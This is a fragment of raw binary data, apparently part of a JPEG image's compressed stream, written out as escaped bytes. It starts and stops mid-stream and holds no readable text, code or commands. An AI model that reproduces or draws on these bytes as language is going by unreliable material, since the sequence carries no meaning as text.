\x80F\xcf\x15X\xcb\xa1\x1b{Nv\x01l(t=\xe1\xa0\xa1\xa1\n\xbb\x834\xfa\x15\xc8\xfa\xc6\x02\t\xc2(\x00PNZb\xc8\x9fc\x12u\xce\xb9N3>\xf0\xaf\xc2\x1d\xd8\xc0a\xdf\x0b-\xac\xeb\x95\x99\x12\x11\\\x10\'-9h:\x85\xbak\xe68\xfd\x08\'[\xbf\xe8A\x15\xf4"G\xf7\xff\x00\xe9w\xf4\x1c\xab\x88?\xe9A\xd4>\x83\xa5&|\xa0|L\xce\x1es\x8b\xed\x95\x7f<\xd7\xea\xe3\xe5\x0b\x0e,\xc14\xb1\xf4\x19\xaf*\xe0\x12\xc1X)\xaf&\xf6\xcbD\x05\xd2\x0b\xbc"P\x10q\xc2`?$\xe8,\xec\\m\xe7\xd0U`k\x8d\x8a\x7f? \xd8\xf2C\x80\xe0C\x01\xb4j\x90o\xf3\x1eNoKe\x8aq\xcf\xa0\x9a\xa6)\xa2\xb0\xd9Bq\xf2\x06\xc3\xc1\x8dF\xec\xc2\x07e\xc09\x93zC>M\x1dn\xce$\xe1\xcb\x93\xd7\xe8\x1d\x83\xa6\x07]\xb7\x17\x83\xe4\xef\x8bx\x84\x18\x9e(\x0e`\r\xc7Yp?\xc1\x12-\xaf\x92i\xf2\xdbRk\xf8\xfd\x03\xb9\xb5\xab}v\xd7\xf9yz3\xf5\x9a\xca\xea\xf9U\x7f\x00\x17\xd0TG\xb5U\xf4\x07\x80\xd7o\xa7\x81,c\t\xdc\xff\x00\xcb`\xe9\xe1\xaat\x1e\xff\x00@k\xe1\x1dQ\xff\x00W\xbd\xcf\xd0\x11=\xd3\'\x84\xf9\xc6\x91j\xf5?\xe2\xa67\x92\xa0\xcc\x18\xf0\x81\xbb\xb9\xf5\xfa\x04\xc0P\xd1\xe3\xe0\xe3\xb2\xc5\xff\x00\xe2\x854c9e\xc1\xc2\xfc\nC+C\x84r\xad~\x81i\x0f\xab\x0cr\x9fy\xcb}\xe6P~\xf3\xb2\xe7e\xce\xcb\x9d\x97;.v\\\xec\xb9\x7f\x94\xbf\xca_\xe5/\xf2\x97\xf9K\xfc\xa7u\xcb\xfc\xa5\xfeR\xff\x00)\x7f\x94\xee\xb9@s\xf5\x80`?y\xc9}\xe7\xceC\xd2\x8f(\x85\xa5x\xbf\xfbX\x02\xb4DH\x13Q\xff\x00\xe5A\x90\x90\xd5\xad<\xf2\xdev\x06\xa4\xf8\x19\xf03\xe0g\xc0\xc5T\x85\xef3\xe6noZ\xc8\x97u\x1a\xc2\x95\xceS\xcc\xfdI\xf1\xa4|m\x01k\xa5\xecn\xb8\xea\x18=e\xfe\x0ea\xed4\xfb\x1ci\xd6\n\x85\xb44\x83\x05n\x98\x9f\x03>\x06|\x0c\xf8\x19@9\x01\xaa|\x0c\xf8\x19\xf03\xe0b"\x8e\xb1\x0c\xcd\x97-\xf0&/S\xd3\xd8\xd5.\x81l\xf4\xc9\x8d\xc5\x06\xf7\x8a\x99!\xf5F\xf9\x96\x1dTx\r\xabJ\x0el\xf8\x19\xf03\xe0g\xc0\xcf\x81\x95\x03"\xdb\x92V\x9cf\x94\xa9ff\x0e\t\xe1$\xa0^\xf3\x13\xe0g\xc0\xc4{\xa85/>A\xb5iA\xcd\x9f\x03>\x06j=\x84b?\xf5\xd0og\xc0\xcf\x81\xf0\xe9\xcb\xd0\xd6|\x0c\xf8\x18e\x9b\xc5u\xe6\x0e\t\xf6\xe7\xc0\xc0\xad\xf7\x13\x95\x18o\xcb\xc6\x18J\xdeS\xe0c\xa1"\xfa\x90\xd1e\xa7\x04\xf8\x18\x1a\x89Uh\x1e \xc2V\xf2\x9f\x03>\x06|\x0c\xcck\xaeg\x87\x94\xd7\x17.\x0fJOi\x01\x88\x84\xf5\n||\x87x\xb9\xe9\x94D\xcb\xf7id\xd1\xeb\x00\xc4V\xc9C\xc5\x08!C\xa5\xcd4\xd8\x11\x9b\xf3\x86\xdbE\xe9\x9d\xfez\xf4\x19y\xe5\x9d\x81\xd57\x9a\xb8\x1f\xcda\xa2y\xb8\x16\xdd\xfd\x8d\x10\xb9\x83\x8c\xd1]\xb0\x9a\x97\xf7\x86\xc3\xb1pK{\x87\xcf\xe2\x86q\xb0\x14\x1b(\x165\x19\xdc^\xc6\xef\\\'\xfb\x84\x1c65M,*\xb8\t,K\x19e\xe2\xa6v\x1b\xd6\x1c\xb5u1\xfc\xef!\xad\x98u_\x9d\x8d^4\x13\xc9\x87]\x889\xb0\x9e,\xe7/\xd6\xcd\x1e\xd1\x1e\xd2\\(\xe5Q\xad\xe2\\\xd6\x01\xe3\x966h\xfet\x8ev\x17\xe3\xa7\xb9!\xf8\x81v\xc2\x0b\x99\xafG\x84tL\xa5\x10?\x9a\xc3D\x9c\r@\x02a\x96\x1d\r>B\xb1H\xaf!\x8e\x8b)V\xfd\x86\xf6\xee\xf1$\xb3\xaeM\xc4\x1d\x04\xc1\xa3\x0e34*\xad\x9e\xfb\xc0\xe5\xafl\xc9\x9d\x89\x8f\xa9\xa1\x04\x16d`\xd4YM\x01\xdf\xe5\x96\x11\xce\xae\xb6_n\xf5\x8e\xee!u\xdc.g\xcb\xdc\xf4\xf1\x0cS\xae\x166nQ\xd9\xf8\xa3\xc7U\x1e+\x95\xa8B\xb8\x8c\xba\xb7\x1e\xad\x95\xe2LNuu\xb1k\x05#\xa5&c\xfdYe\xce\xcf\xc1\xf0\x13\xfb\t\x9f\xb8q\x97\xbfX({\xa2_\x948d0\x99\x18\x9c%1\xc0\xb1\xaa\x8f\xef\xc3\xa3\x87\x1e\xb0\xc4\x94s\x17\x16 @\rV\x0f}\x94\'\x0e\x93\x7fK\xf77\xb4J\xa2n<\xef\x1ez\x06\x9c\xe4t\x8blU\xa1\xb5\xe0\x01B:L\xe1#\x7f\xd1\x08uv\xfd\xb4\x95g\xd1\'\xe2!\xa9\xef\xaeN!`;\x92>,F\x9d\xfe\x93\x15\x95F\xef\x99\x0fo\xe5\xb2\x1cN\x8dQ\xa7;\x82\xb9\xa3oj":\xf8-\xb3=@[\xcd\x0c\xf8o\xeaa,\xb5Z\xcfw\xf9\xf6\x1b>\xeaA\x93K\xd4\xd6h>\xd4\xe3\xca\x00]\xf1`tKm\x9f\x83\x0cf\xac9\xaf,\xcf(y\xceC~\xce\xdf\x9c=44\xbeR\x94\x1a\x06\xfc\x9b4\xf7\xee\x82\x8b_\x9a\xb5\xd9\x8c\xfb\x84\xae\xae\xcd>g\xae@\xbb\x085t\x99u\x14\xc67\xb6\x93\x16u3\xb4\xdf\x82j\x1d5V\x9de\xe9_\xa2<X\xea _\x90\xd7\t/\xd6\xad\xccoO\x99\x95\x13\x85F\xc0A\xc0Z\x00EqU:\xaa\xae|7\xf5-\xbf#pU\xe2\xf6\x19\xdaxf\xa1\xaeSN#\x0es\xf5\xa2\x0c\xdf5\xae\x1b\x88\xed\x1d~\xd0\x86\xdc\x8f\x0fi\xa7\x1b+f\x8e=5\x17\xf5\x05\xea(r%\xcb\xc1O^\xb1\xf6\xb7\x9f\xf0Jk|T\xff\x00\x13\xa8}l\x088o\xa3\xd7\x9c\xed\x1c\x1b=\xb6\x02\xaf\xc4sb_\xdf\xce,N\xee=\xadg\xc3\x7fS(\x1e\xc7q\xd2a\xec\xc8\xd6g\xc3\x7fR\xfb\xe8W\xc0k\xc71\x90\xd5\xad\xaf\x13t:\xec)8\x8csR\x1c\xe5ya\xcb\xf5o\xb4\xa6>\x89?\x11>C}pz\xc2R;\x92{\xbd\xad\xfd\xdc\xec\xdc\xf6\x0f\xcai\xcfP\xd0Cw\xe2\xb0{K\xf6%c\x8dO\x86\xfe\xa5\xc2\x9e\xc3S\xdbl?\x8aA3Ff\xd68\xde\xa4<\x1dN\xb6:\xf1.\x9f\xd4\xbf\xbb\x1bn\xb8\xa3!\xb7\xde\x91@3\x1fM\r\x8a\x0e\\8\x10\xa7\x04\xfd\x8d\x98\xa2-!\xc6\xc9\xf0\xdf\xd4\xa4p\xeb\xa2N\xb1\xc3\xfa\x83O\xb5\xfdN6\xcf\xbb\x06\xccK\x02;\xb1\xb9\x99\xa9\xf6e\xfb\x88\x9d4W\xf5\xa6~&(\xc5s\xd9\xc5\x1a\x9e\x90y\xc8\xfb\xab\xf3\xfbO\x1f\x03\xf7\x87\x97\x01\xc2J\xf6/j\xeeg\x92\x06\x8c\xeb\x95l\xe3\xda\xe3e\x95s\xd08\xcdocz.e\x05Fzl\x0b\xd5\xef\xf2\xec\xbb3#\xbd,\x9a\xec6\xe3a\xfd\xdf\xe7\xd9F\xed?\xc0\xd9\xa4q\xb7\xdb\xb0SFs\x1e\x04v\xfc\xfc\x0bo\xfc\xf0ipHj\xf6\x1d\x01_$\xefb\x0e\xbf\xb88"R\xad\xae\xae\xcao\xcaX\x01\xb4h\x1b\x1d\x84@6\xc2v\xd1\xe7\x12)\x80\xba5\x95\xa3\xef\x95\x87\x0b\x94\xe7\xd9o\x9e\x17\xaeh]\xa5X\xa7\x8e\xce\xed\xc3\xc0%U\xf5\xcdg\x91\xd7\xb0\xce\xd3\xc3\x02\xef\xf2\x0ee\xadM5\x86z}"\x9f\x92q\x01\xe1\xfc\xe0\t\xa2\x9f\x0b\xa1Ic\xcc\x9b\xc5(8\x1df\xaaIz\xcc\x8a\x13\xf93M\xb7Nn\xe2=Y\'\x9a\xa0#\x81\xben\xf6]3\xac\xa2N\x91\x8dv\'nR\xc5\x89\xf7\xb6v\x8e\r\x8b.\x0c\xa4\xfb\xa5\x0e\x8a\x98\x16\x88\x0c\x8f:\xd72+W-3\\\x12\xac\x0c\x9cFg\xfd\xd79x\x9c.\x1az\xac\xbd:=\xe7\t\xabe\xea>Dr\xdd\x1b\x1a\x0bh\xf1i\x8es:?e\xc6\xa0s\xa5\x9f\xa5l\xafz~\xf9=\xdcZ\xb1%8\xe6[Z\xc1\r\x1b\xa9\xd3\x9cD\xdb\xce\xf1\xa2{\x07\xe51|\x98\xe0\xbc\xe1\xc5\xdd\x02\xdd\xb2\xc2\xad\xb3Ut\x91\xd5=\xb6\xc2H\x14\xd4\xa4\'\xad\xd0\x1d\xdb\r\xa2\xd4\xad`#\xa0\x00\xb5w\x13\x86d\xb3$\xa6\r\x9d\xb3k\x97\xef/\xb1\x84\x8d<\t\xac[\x1dib\xe7t\xe0\xc4\xcf0T\xfc\xac\xf6\x91\x88\xa4\xb8\xc3\xac8\xbfy\x00 \x8e\x89\xb0T\x1dy\xfd\x9cw \xd0l/ZS\x9b\xf0\xc0\n,JHB\x95\xe9\x9b\x8f\x9d\xdax\xf8\x1eO0\x876\xf8\xc8S\x93\x91/"\xd7\x055\xb5{w\x07\x82cv\x9e\x0e\xcd=\xbf\x1f\xdd\xfe}\x8cf\xa2\xfb&\x92\xaa4\xcf{p\xe7\x01\x1a\x9cS\xec3{:\x05,U\x15xx\xf8>\x04v\xfc\xfc\x0b\x01\xc2\xb3\x95E\xc4}\x9d\x96\xcf}94f\xb0I\xf5\x9a\x83 \xfaM\x07~\xba\xd1\xbb\xa7=\xdf\xcef\xddTN\x91\x7f\xae\xef\x13\xd7[)\x9e\x93\xac0\xe5?\xf5\xf7\xc3\x1aR\xb4g\xa9\x0c\x0b\xf52\x13\x0f\xccK\x8by\xb3\xbbp\xf3\x04\xf3\xafa\x9d\xa7\x86[\xe0\x99\xdc\xbe2\xe0\xcc\x00[\x04\xea\xe1\xa3\xd1\x98\x9dx\xb40\xb5\xcb\xea\x1e.:\xdfOf;\xf7\x84g]\x7f\x9c\x05\xb4[\xe8\xc1\xb2,5\x8b\\cg\xd5ew\xa9\x92\xa7h\xe0\xd8\xa6S\x7f\xae\r\x9a\xe9\x1a\xeb\x88\xd7\xd5do%\xf0\x9d\xc3n\xa1]\x9e\xbdf\x94<zO\xe5G\xd7\xc8\x99\xc8Yp5\xc0\xdcDB\x80\xb5\x9873\x7f1\xb7\xa6\xa7"]+\xbd<\xd6\xce\xe5\xc2{\xb8\xee\xf9\xcet\xc7\xb7]\xbe\xc1\xf9M\x04\xbf\x19\rk\x06\x9dW*o\xe3\xb6;\xf7\x16{m\xaf7*\x01m"\x00\x13V\x93\xb7p"(\xd8X\x0c\xa5\xf96o\xcd\x13\xdd?+A\xc7`\x81\xd6\x91Z\xc4H5\x8c\xb3V\xe2\xe7\xb4\x9a|\xe1i\x91\xe59\xee\xfep\x9e\xcdX\xc9\xc1\x06\xf5\xa5u\xd9\xaac\xfa\xb1\xb3pA\x96\x83\xc8zG\x12\xda\xbf^v\xbc?\xcc\xe3a\'\x86\x8b\xa8\x19\xce\x06\x81\x01 \xa79\xdeK\xb5(\x1cF>\x10\x1a\xc2;\x08\xba\x07\xa9\x0b\x90h\xde\x8de\xa7\x188\x8c\xbd\xc2\xe9\xd7b\xca\xa0\xc6\xbb(\xe833pT\x05%\xa0\xdd+1\xb7n2\xf5U:-\x857\xc5\xc6~i\r\xfa\x87Y\x0b\x13#\xb6\x85/\x8b\xfd\xf6/\x92\xe37{\x0c*(E\xc2\x02\x80\x83\xd6[\xae{c}\xe7\x82\xea\xe1\xc8\x15\xe8i\xb3\xb3\xf1\x8bE\xcf\x921\x9d\xd7>\xc37\xbc\x84`\xd0\x01\xb2\xf4\xc6\\\xdc6\n#\xc0\xaa\x8d\xe3Lt\x85\xb5m\xeb1YS\x91.\xf6h\xe3\xd4\xceM\x9a\x99\xf13\x83f\xf3\x1e-\xb1g\xd4\x06\xf7\x87\x92h$1%\xa0\xd0&\xbc\xa44b\xbb\n\r$\n\xac\xaf^$\xfb\xcb.\xfb\xc2\x88\'\xee\x95\x98\x1a\xb1\xbdW\xe2\xa4\xc1\x13\x994>\xb58;\xc8\xb7\xd0*\xf2\'.\xad\xc0i\xb2\x85\x98\x07u\xbeu\x0f;\xbaJ\xee\xeeQ\xf6e\x7f\'\xc5\x83\xaa\xf3x\xe7`\xdf\xbb\xf7\xe1P\xba\x07\xee\x13Q\x13\x05\x8c\xb5\xa5\x88p4&\xa1v\xd7\x13y/D_Rf\xc9\x02\xabo\x88J\xae5\xae\xca\x8d\xde\xf7\xd7\x15\t\xea\x94L\xff\x00\xbf\xc8LIu\xc7\x12X\x99\x83\x88\xc5\\\x01\xe1;\x12f\xa5}U.6\x02\xbb\xe5\x1d\xedq!\xd8\xab\x87\x1b\x9b\xb2u\xca\xd8\xf6\x0f\xcaS\xa1\xbb}3\x1a\xca\xaf\xcd\x80\x14\xdd\xb3\xbfqc\xa0p\xadv*\xa8\xb5\xbc\xb3.J\xf7\x16\xce\xcf\xc1\x86\x98\x04\x1cR\x02\x12\xd2o \xde\xaa\r\xd8\x97\xfd\xe1\x7f\xb1\xd2oK\x019o\x82\xfc\xa1S\x06\x81\x80\x8c\xcf\x8e=H\xf4k:r\x9a<}6\xe6\x19\xc6\xa0X\xccA\x8f\xc0\xb6\xc6o\x918\xb6,\xb4\x9b\xd0\x9c`\x06\x85l\xd3\xa6\xc7\x13v\xc2\xe5\x1f\xfb/\x83\xb0\xf3\xf3\x92.\x9c\xe7tN\xe8\x8e\x056\x9b\xd8\x01\x114H\x0e\xb4\xe63\xd3b\xc0\'\x02\x8e\x84\xd5~\xa6\xf8( Q\xa4\xee\x88\x03\xab`d\xd1;\xa2.\xb5\x9f`gt@AB\xe9\xa9c;\xa2w\xe4\x1c\x0fu7\xb3\xba&du\xdbf\x83\x1e\xaf\xb1\x85\x7f\xe4\x8f/|\xaf\xb6\xd2>\xb87N\xe8\x9d\xf9\x11\x0bV\xd6\x1b\xbd\xd87\xce\xe8\x9d\xd1\x15\xbd5\\\xb6-\xf4/}a9\xbc\xa9P+At\xe7\xc28\xcbtn\xb2\xa7tE\xc7\x12\r6\xeb>\xc3v\xe2"\x1fn\xb6\x15\xdb\x060\x13\x95\x95\xcax\x93\x1d9\x84\xcdLL\x96\xbb\x05|(1\xa1;\xa2?H)1\xb38"\xe9\xcewD}e|\x8b\x83\x83\xec\x7fg\xc6\xff\x00g\xc6\xff\x00g\xc6\xff\x00f5\x05\xdfN\xe8\x9d\xd1\x0b\xf3\xf0\x02o\xe09O\xd9>\xf4\xcec\x83M\xa1\xb9\xe8B+\xc2]c\xe3\x7f\xb3\xe3\x7f\xb3\xe3\x7f\xb0\x8e\x9a\xa5\xc7ndE\xd2\x10;\xa1\xc4\xda\xf5\x81\xb10\x90-/RU\x8e\x93\xff\x00b>?\x974\x8f\xa9\xbawD\xceH\xbbr\x9cx\xf5:\xf5\x98E\xd7$s\x8dh\xb5\x99N\xb5^\xea\x9aW\xc7\x90\xe5SN\xe3ffhag\rq\x9f\x1b\xfd\x9f\x1b\xfd\x9f\x1b\xfd\x80\x0e\xafn\xc0@=\xb9\xdd\x11X9k\xf3\xbf-\x87\x94\r\x89\xa9\r\xd7\x9c\xc6z{\x18V\x80\x14i5."\x80\x00Vt\x9d\xd1\x06\xbb\xa1xLh\xaa\xe4N\xe8\x80\r\xd0^\x10\x19kK\x96\xf9\xcby\xff\x00\x04%\xeb-\xef\xbd\x89\x05\x8c\xfc\xa0\x00\x14\x9d\'tN\xe8\x9d\xd15p\xebq\x80\x00\xa4\xe9;\xa2=\xe6\xdao\xd9~\xaf6\xbdat\xf7\xdd\xd3\xec\xa4\xc8\xf17T\xb7a\xa1}\xe4\x1eo\x9eH\xd5 y.\x13\xba"\xa7\x13^\xff\x00$\xef\xc9\xce&\x15=F\x08\x8d\xaf|\xaf\xb6\xc0HW@\x8f\xf4\xdb\xe0\xe2%\x9b\x8fW\x1f\xf9Ckp\x1c\xc7x\x83N\x9f\xf9%\x80K\xd4\xb8]\xba\xf0\xce:\xbd\xd9\xea\xcbF\x02s\x7f\xe7\xed\xa2\x8a\x87\x16\xb8?\xf9p\xd6\xb9\x0f\xf7F[\xae\x7f\xd5:\x85Xj$\xf4s\x8b\xf4M[\xce\xae\xbf\xff\x00\x1b7\xff\xc4\x00.\x10\x01\x00\x02\x01\x03\x02\x05\x03\x04\x02\x03\x01\x00\x00\x00\x00\x01\x00\x111\x10!QAa 0pq\x81\x91\xa1\xf0@\xb1\xd1\xf1P\xc1`\xa0\xe1\xc0\xff\xda\x00\x08\x01\x01\x00\x01?\x10\xff\x00\xa5h\xc7\xdd\x89J\x9f\xf5g\xfa\xca^\x9f\xc97\xa9\xfc;\xa3\xa0\xa3\x85\x9e\x8c\xa6\xc7P"\x96]`9\xa1@<#\x06\nD\xb8\xde\x9e("2\xfa>\x8b^\xa5e\xe8\x12\xd8\x89\xbd\x1c\xe7\xc8\xb3\x9e\xdb9Q\x10Y\x8b\x0f\xa2\x88\x9d\xf4\x04\x15\x84/\x95\xf2\x8d\x9b\x85\xa50\xe4\x82\r\xaflz$\n\x80Z\xc3K\xbe{#\xe5\xd1\x1d\x82\xa5\xf11\x99.\x93\xd1\x1b\x1b\xe19\x8d\x8cy\xdbd\xd2\x13\xa9\xcf\xa2\x03\xed\x88\x1e\xf0\xba\x19\x1c\xf9\xe3\x86\xdc\x08Cl\xb3\xe5z\x1ec\xbfy\xe0\xbbf\rc\xf7I\x8d\x9e\xf0\x97\xf3j\xaa\'\xf3L\x9d\xf6\x83\xc3\x1e\x04\x11\xc4\xad\nvb\x9e\xc1\xee\xbd\x0f\xb2\n\x1f\xaf.\x1cy{\xc7\x95\x1e\xc1\x16i\xfb\x11\x05r\xf4\x18\xb4\x01p:\xc9\xf2\x83\xe9\xf9t\xb6J\xb9\x11]g\xb4 \xdb\x1d\xa1y\x03\xab\xa8\x95\x14\x1e\x04jQ\x8eP\xbc\xb6\x8ap\xa6\x13%e|z\x1a*AW\x15\xba1\x01\x89\x85\x9c\xc4\xb7\xad\xfc\xe5\xd0\x97\x83y\xd8\xfa#\xe0b\xf0\x97@>\xcd\xc7b\xd6\xa2)c\xc1\xbc\xec}1\xa0\x02a\xfd)Z5(\x90\xeaN\xf2\xe9\xc9\x08\x9c\x7fk\xe8\x95*\xf6\xd9|3\x03\xd2O\x00Pl\xca\x83\xb7W\xcf\x82\xdfCO\x03\xe5\xef\xe8\x89\xa3\xf4\x8b\x02\xb4H \x1b\x0b\xa5\xc6\xc0\x80\xdf\x92\xeaU@\xca\xc7}/\xf6\\\x11\xa1^#t\xe7\xa2\x0c\x8d\xb8\x0fl\xd0\xd8\xb8\x83f\xa7\x1aTb\x08\r\x889\\\n\xf5\xfaQ\x1e\x90\xc07<\x18\xc0\xa4\x9e\xba\xa1$\xe3\x80\xe79aA\x15\x00f\xcb E\x12\x93\xd0\xd3R\xc1\xdc\x8d\x03\t\xa9\x18\xc7\xf43\x19\xa4\xe9o.\xb5>\tn_\xae\x97\x92\xa0>\xbd\xf7\xb2\xcd\xb4\xeb:\x11\xf49\x15\xb7;{x\x01\xd6\xf5>J\xa4L\x85R\xb7>\x86\x9b\xc0\xeb\x0e\xc1\x15U}\r\xbb\x91\x80\x8e\xd8FT\xd3C\tZ.\xf3Q]\xaa\x08T\xedv\xf1\xf3+E\xdd\xafB\x05\x00\x1b\x18\xd0e\x8a \rE\x0c\x16\xb2\xdd\xcf\xa1\xa6]\xd8\xa0\x91,D\xbb\xc9\x10*\xdb>\x92\xf9\xef\x13yS4\x96\x96\x0e\xb2a%mr\xa5j\xe1@\xed\xf4\xee\xcd\xdc\x84\xa7V;p"\x96m\xd3\x00\xfc\x14\x11\x1e\xd8^\xe2"\x91)2z\x15\xbf\xa5y\x83r\x11y@\xfd\x00\x1aB\xa8E\x9b\xc5\xe4\xdf8\x19^R\xbc\xe2\x9b0\xb1\x1e\x8b\xa3\xc3\xc0\x04/\n\xba\xd2<\xcc\xdb\xdd\x95\x8d\xeb\xb8\xa2L\xb8@|\xa05\x80\xa4{m\xe9\xb9\xbc_\xc1\xe8F\t\xf1\xf7\x87\xe9\xcb\x9b\x18\xbcK\xb7\xa0\xe5_Z~\xa4\xbd\x81\xe88\xa9\x88`\xfd3)\xda\x12\x1d\x80\xdc\x8f\xa0\xf9\\Pe\xaf\x92\x8a\x06\xeb\x8e\xa6V\xa1\xcb)[\xd7\xdal*^\x05K\xff\x00h\xe2\x05\x1d\xdf%st\x9fX\x0cyT\xea\x1e\x83\x18\xee\x82\xf0R\xc4^\ny9\x884\xe8G@0+\x80G\t\x0b+\x82\xa1\x0e\xe1\xd9\xe1\xf2N\xc9\xd5\tb%\x89\xb9\x05J;\xe8,s\xf5{\x1e\xd5*l6<\x80{\xac+\x1b\xa0\x10\x90\xe9\xbe\xbbi\x8a\xb9\xd7\x92<\x92\xdf\x8e\xd0\t\xd8\xbe\x82DB\x84\x98\xbc\xa16\x8bK\x87\x91[\xe4\x19k\xca\x14\xea$\x00^\xe4\xc6n\x02+\xea\x8a\xbffG\x01-s\xe4\t\xb5\xd4\xd1\xdcB\xc4\xa4\x8e\x11\xbd\xf1\xfa\x06`\xfb>\xea\x95Zm<_"\xcbe\xcb\x1f\x85\xb2\xb0zX\xe4c\xa5\xf7UC\x8b\xfb\tw\xa5\xf4<\x83t9a\xd5\xe0\xe8JW\xd3{\xbf@\x81P!\x82\xa7\xf25|\xc6\x8eC\xc9\xa8 \x01\xc0\xc9\xf7i\x18b\xbc\x8d\xa2\x8b\x84J\xa2\xb5\x1f\xc50:\xd2}\x01Z%\x8f\x85\x14\x00\x1a\xd4\xfb3 \xc9\xfaF:+a\xbe\x07rQ\x8a\xb2\xfb=\x01\xc8r\xf0$F\xb8\xaa~\x95NJ\x07\xa0\xc8\xe7\xf6=\xe5\x8e1\xafhT\xc6dT\x8f\xban\xde?B#\x88"\xcet\x95d\x18\xf0\xb77k\xee\xf4\x04(\x89\x0c\x88A\xb0ua\x05Q\x8b\x8a"\xd7\x9be\xdf\xe8U\xb4=\xa1\xd0\xa5\xe1c\x90\xdd\x03\xe7^9\x8f\x90v\xbf\xb9\x8f\tv\xbe\x81\n\x84Q0\xc2L\xbc\x10W\xbf\xd5\xc2}\xd4S\x92Jfv\x95\xa5iZV\x85\xa0\xf1\xbcH\x88\x88\xbf\x84\x88\x88\xbc,\x00\x07\x10)B\x12\xff\x00\xeb\xe7\xf7YqK\x8e\xf1\xfbVR\xdf\xfbX\x00\x05\\\x04xM@D{\x8f\xfc\xaa\xba\xf7RKr\xf9\xe0\xb9\xbba<;\xde\xf6\x1d\x90ET\xf3\x08\xe47*\xcaM\xdf\xdb\xc3\x10\xa20F\xc1\xa6\xe1>1\x05gCq\x03T\x9e\xf3\xa2)"->\x92p\xa4\xdd\xee{\xea6\x0f\x80\xc0\x88\xa8\x02\x8f\x0f{\xde\xc1G\xf7"\x97O\x87{\xde\xc5\xa4\n\'r\x05\x9f\x8a\x03\xcf\x18F\x19\xaf\xd7\xa3\x91\xa3\xbb} \xc5\xc6.\x03\xbb\xcdE\xee\xcb \x97\xbc\x14\x9bP\x8e\xd0[\xe0md\x9b*Px\xb7\xbd\xefi\xcfu\x8c\x9aV+\x11\\4\xae\x95s\xca)<.Q\x00\xad\x1a\xb7\xbap]:\xa0\x0f!5\x82l\xa9A\xae\xf7B\x0b\xdb\x85\xb4@\xfc\xdc\xc2`5\xdeQ\x14rx\x04\xee]\xb1\xab{^w\x93\xfe\xaf1\xfa\x84\xb14\xed\xf7\xc1\xb8\xef8\xa1\xe31\xe0\x08\x9avU\xe0\x82\x9a\xc1\x95 oZazm\xd9Mv\x02\xd7\xc4\xc5\xc0"x;\xde\xc3\xba\x92\x14[\xc2A\xd3\xaf\xa43\xda\xf2\xae\xa0\x1c\xbcQ{H\x17\xb8\xf8\xc1\xb6u\xd49x!d\xee\xfb\x07\xde\x1a\x05}\xdc\x97\xea\xad\xf9SR\x8f\x9d\xea\x18\x0c\xe4\xb0\xa1\xca\xa1fjx\x876\xc3~->\x93\xe7\xa3|\xb4+\r\xc7F\x87\x94Bi\x0f\xbd\x93\xb4u\x1f7\xcc\xfd\xee\x83\x12\xc1\xc377\xcb\x88\xd7\'\x17V\xde\xfe\xeb}\x02\x19:^,\xa7\xbb\x8c\x06\x83\xfe\x8d`[\xe8\\\xfb\x9c\xfc\xaf\t\xf4\xf3\xdf\x0bJ y\x0cC:00\x8e\xe2@\xddi\xa5\x80\xd0\xa2V\x03\xcc\xa9\xbbq\xd5P\xd1\x08L6\x8a\xa2\\\x80\xa4h|\xe8-\x04.\xd3f\xca\x02\xa8\x06X\xf9\xdd\xa9\x1eF+*_Cv\x87\x86?\x82\xe1\xa6\xf2LVy\xf4&\xd3\xb0\x9c=0\xbf\xd8\xdfA\x96\xee`\x85%v\xfab\xb8\x8f\x84\xb5 \x98\x14\x87\xde\xc9\xda:\x8c<\xa2*\xdc4[\x12\xd5[[\xa0\xf2\x03\xbb\x05\x80*\xcd\xe0=\xf0eN\x8b\xfd\xde\xd1\x84\\\xdcE\x00\xcb\tK\x0c\xe4\x9bg?\xe5\x17Q\n\x0e\xcb\xf0\x02\x1e]\x8c\xd24\xd01\x8b\x02\xa0\x0b\x13q\x18Db\x157^\\&h\x0e\xf4\xeb\xa2\x00\xe6\xce\xc4\xd2T\xcco\x0ea\x1d;y^\xf3\x9f\x15\xe0\x01\x15\xdd\xd1y}\xfc\xbdYJ\xff\x00\xebt\xc0h\x1a\xe0\x16$\xb2G\x86\xad\xc7\x88\xef^\r\xdc\xeb\xa2\x7f\xb9\xc1\x83w\xe3\xae\xa1\x93\xc3\xed\xaeB~?t\x02O\xbder\xba\xb1t5\x06/\x03\x02fJ\xc0=D\x84-\xaa\xdb\xb2\xef\xaf\xc4\xf0;\'\x87\xe9\xa2}\xb3\x04x\x0f\xcf\xda\n\x96TP\x07Ua\xbc^\xfd\xf5\x08\x83\xc2-Kh<\xfd\xe7\xf7\xe9@\x9b\x9e\x8bI\xe7\xae\xdc\xdd\xdcPC\x8b\xea\xadUh*\rJc\xba\xa1\xd7\x15\x9b\xb9\xb1&\xf9:\xcc\xfbu\x0e\xab\xfb\xaf\xd6\x0b,X\x99\x00\xe8\x15J)\x186\xeek(\x93\xbb\xe3:xt\x13\xab$?\xf4\x81\xc2,f\xf4\xc8\xc9\xeb\x7f\x80$\xfe\x94\xaf*(%\xed\\$\x0e\'\xd6\xd5\xac\x13A\xd4k\x1cZ\xcf"\x83s\xce\xf3\x84\x8d\xf7\xd0c\xe4\xc6\xa4.xT&#K\xf7\xd7\n\xb8>\xb1\x9c<q\x03\x8aF/\xf5\x08\xd3\xeer\xdf\xaeX\xa4\xf4\xe2\x8c\xc6\x97\xdd\xcd\xbb\x06\x93\xaf4\x1a<I\xf0\xd3nE\xfdA\xa6V\x15\xe6\xe0\x01\xa3\x940\x10\xda\xe7-{\xf7\xba\x02\xc1\xcb\xd6\xdd\x04\xc1\xbfk\x9b\xf6f\xeb\xb6usK\xda\xd5{\xb1\x0e\xc3\x84\xe4_1\xb2\xb4\xb8\xb3\xaf\x9a\x06!\xd5\xa6\x12\xb3\x9a\xcc\xce\x93\xef\xea\xbf\x16\xd9\x17\xe4\x0eH:\x04\xe2\x16d\x1cz\xaf\xf8\x88d\x8aH\xe3T\xad\xea$\xecR\x88\xbe\x06\xbc4\xb4\x80\xf6\x8d;\x99\xcd\x87S\xb88\x1c\xfc\x08v\xf8\x0c\x1a!\xda\xfe\xe6\xdf\x97\xf6R\x1f\xec\xf5`N\xa0\xce\xcd\x0e\x90w\xd6^8\x83\x10\xf5\xd8\xe1\xabo\xe4\xf8@\xa4\xd1\x0c\xee\xe6\xa6\xcaK\x99\x86\xcc\x07O\xaf\xa6\xf7P\x08ir\x98Y\xe1,t\xde\xbc\xab\xcdm\xb1~2\x95\x8a"\t\xee\x8e\x19o\xf3\x9d\xb0\xce\xb2\xf2\xc0R2\xe8&\xc3\xd1+;\xa3\x0c\xff\x00\x14I_\xdf~\xb2\x08n\xc6\xcc\xef\x1au(\xa4|\x1f\xc3\xe5\xa4\xc4\x7f\x0f\